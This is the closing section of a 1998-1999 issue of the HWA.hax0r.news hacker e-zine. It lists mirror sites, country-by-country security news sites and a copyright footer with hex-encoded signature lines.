http://www.attrition.org/~modify/texts/zines/HWA/
http://archives.projectgamma.com/zines/hwa/.
http://www.403-security.org/Htmls/hwa.hax0r.news.htm
http://viper.dmrt.com/files/=E-Zines/HWA.hax0r.news/
http://hwa.hax0r.news.8m.com/
http://www.fortunecity.com/skyscraper/feature/103/
International links:(TBC)
~~~~~~~~~~~~~~~~~~~~~~~~~
Foreign correspondants and others please send in news site links that
have security news from foreign countries for inclusion in this list
thanks... - Ed
Belgium.......: http://securax.org/cum/ *New address*
Brasil........: http://www.psynet.net/ka0z
http://www.elementais.cjb.net
Canada .......: http://www.hackcanada.com
Croatia.......: http://security.monitor.hr
Columbia......: http://www.cascabel.8m.com
http://www.intrusos.cjb.net
Finland ........http://hackunlimited.com/
Germany ........http://www.alldas.de/
http://www.security-news.com/
Indonesia.....: http://www.k-elektronik.org/index2.html
http://members.xoom.com/neblonica/
http://hackerlink.or.id/
Netherlands...: http://security.pine.nl/
Russia........: http://www.tsu.ru/~eugene/
Singapore.....: http://www.icepoint.com
South Africa ...http://www.hackers.co.za
http://www.hack.co.za
http://www.posthuman.za.net
Turkey........: http://www.trscene.org - Turkish Scene is Turkey's first
and best security related e-zine.
.za (South Africa) sites contributed by wyzwun tnx guy...
Got a link for this section? email it to hwa@press.usmc.net and i'll
review it and post it here if it merits it.
@HWA
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
© 1998, 1999 (c) Cruciphux/HWA.hax0r.news <tm> (R) { w00t }
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--EoF-HWA-EoF--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-
[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ]
[45:6E:64]-[28:63:29:31:39:39:38:20:68:77:61:20:73:74:65:76:65]
